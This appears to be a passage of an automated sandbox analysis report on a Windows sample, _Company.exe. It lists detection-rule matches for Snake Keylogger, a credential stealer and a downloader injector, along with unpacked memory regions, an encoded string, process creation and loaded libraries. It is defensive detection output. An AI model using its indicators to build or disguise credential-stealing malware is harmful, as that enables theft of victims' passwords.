              Source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
              Source: 1.2._Company.exe.2ef4340.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
              Source: 00000001.00000002.4651072247.0000000005760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects downloader injector Author: ditekSHen
              Source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: _Company.exe PID: 6080, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: _Company.exe PID: 7100, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: C:\Users\user\Desktop\_Company.exeCode function: 1_2_0128D3041_2_0128D304
              Source: C:\Users\user\Desktop\_Company.exeCode function: 1_2_053565B01_2_053565B0
              Source: C:\Users\user\Desktop\_Company.exeCode function: 1_2_0535BF701_2_0535BF70
              Source: C:\Users\user\Desktop\_Company.exeCode function: 1_2_053500061_2_05350006
              Source: C:\Users\user\Desktop\_Company.exeCode function: 1_2_053500401_2_05350040
              Source: C:\Users\user\Desktop\_Company.exeCode function: 1_2_0535AD601_2_0535AD60
              Source: C:\Users\user\Desktop\_Company.exeCode function: 1_2_0535BF601_2_0535BF60
              Source: C:\Users\user\Desktop\_Company.exeCode function: 1_2_061796801_2_06179680
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_010A71572_2_010A7157
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_010A26682_2_010A2668
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_010AC0B82_2_010AC0B8
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_010A53082_2_010A5308
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_010A22542_2_010A2254
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0139C1472_2_0139C147
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_013953622_2_01395362
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0139D2782_2_0139D278
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0139D5482_2_0139D548
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0139C4752_2_0139C475
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0139C7382_2_0139C738
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0139F9612_2_0139F961
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_013969A02_2_013969A0
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0139E9882_2_0139E988
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0139CA082_2_0139CA08
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_01399DE02_2_01399DE0
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0139CCD82_2_0139CCD8
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0139CFAC2_2_0139CFAC
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_01396FC82_2_01396FC8
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0139E97C2_2_0139E97C
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_013939F02_2_013939F0
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_013929EC2_2_013929EC
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_01393AA12_2_01393AA1
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_01393E092_2_01393E09
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_055695482_2_05569548
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_055629682_2_05562968
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556FC682_2_0556FC68
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_05569C182_2_05569C18
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_055650282_2_05565028
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_05560B302_2_05560B30
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_055617A02_2_055617A0
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_05561E802_2_05561E80
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556D5502_2_0556D550
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556295A2_2_0556295A
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556D5402_2_0556D540
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556DDFF2_2_0556DDFF
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556D9992_2_0556D999
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556D9A82_2_0556D9A8
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_055600402_2_05560040
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556F8102_2_0556F810
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_055650182_2_05565018
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_055600062_2_05560006
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556F8012_2_0556F801
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556D0F82_2_0556D0F8
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556CC8F2_2_0556CC8F
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556CCA02_2_0556CCA0
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556EF512_2_0556EF51
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556EF602_2_0556EF60
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556EB082_2_0556EB08
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_05560B202_2_05560B20
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_05568B912_2_05568B91
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556178F2_2_0556178F
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556F3B82_2_0556F3B8
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_05568BA02_2_05568BA0
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556F3A82_2_0556F3A8
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556E2582_2_0556E258
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556E2492_2_0556E249
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_05561E702_2_05561E70
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556DE002_2_0556DE00
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556EAF82_2_0556EAF8
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556E6B02_2_0556E6B0
              Source: C:\Users\user\Desktop\_Company.exeCode function: 2_2_0556E6AF2_2_0556E6AF
              Source: _Company.exe, 00000001.00000002.4647497521.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs _Company.exe
              Source: _Company.exe, 00000001.00000002.4647497521.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs _Company.exe
              Source: _Company.exe, 00000001.00000002.4651072247.0000000005760000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs _Company.exe
              Source: _Company.exe, 00000001.00000002.4650749475.0000000005610000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs _Company.exe
              Source: _Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs _Company.exe
              Source: _Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs _Company.exe
              Source: _Company.exe, 00000001.00000002.4646190970.00000000010BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs _Company.exe
              Source: _Company.exe, 00000001.00000000.2189576131.0000000000ACA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePano.exe* vs _Company.exe
              Source: _Company.exe, 00000002.00000002.4645850927.0000000000446000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs _Company.exe
              Source: _Company.exe, 00000002.00000002.4645988983.0000000000EF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs _Company.exe
              Source: _Company.exeBinary or memory string: OriginalFilenamePano.exe* vs _Company.exe
              Source: _Company.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 1.2._Company.exe.5760000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 1.2._Company.exe.5760000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 1.2._Company.exe.3f4ad70.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 1.2._Company.exe.2ef4340.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 00000001.00000002.4651072247.0000000005760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
              Source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: _Company.exe PID: 6080, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: _Company.exe PID: 7100, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 1.2._Company.exe.5760000.7.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1.2._Company.exe.4043e10.4.raw.unpack, m.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1.2._Company.exe.4043e10.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1.2._Company.exe.4043e10.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1.2._Company.exe.4087840.3.raw.unpack, m.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1.2._Company.exe.4087840.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1.2._Company.exe.4087840.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1.2._Company.exe.3f4ad70.5.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1.2._Company.exe.5760000.7.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
              Source: 1.2._Company.exe.3f4ad70.5.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@4/4
              Source: C:\Users\user\Desktop\_Company.exeMutant created: NULL
              Source: _Company.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: _Company.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              Source: C:\Users\user\Desktop\_Company.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: _Company.exe, 00000002.00000002.4647934767.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.00000000033C6000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003383000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.00000000033D2000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003392000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: _Company.exeReversingLabs: Detection: 47%
              Source: unknownProcess created: C:\Users\user\Desktop\_Company.exe "C:\Users\user\Desktop\_Company.exe"
              Source: C:\Users\user\Desktop\_Company.exeProcess created: C:\Users\user\Desktop\_Company.exe "C:\Users\user\Desktop\_Company.exe"
              Source: C:\Users\user\Desktop\_Company.exeProcess created: C:\Users\user\Desktop\_Company.exe "C:\Users\user\Desktop\_Company.exe"Jump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\_Company.exeSection loaded: gpapi.dllJump to behavior
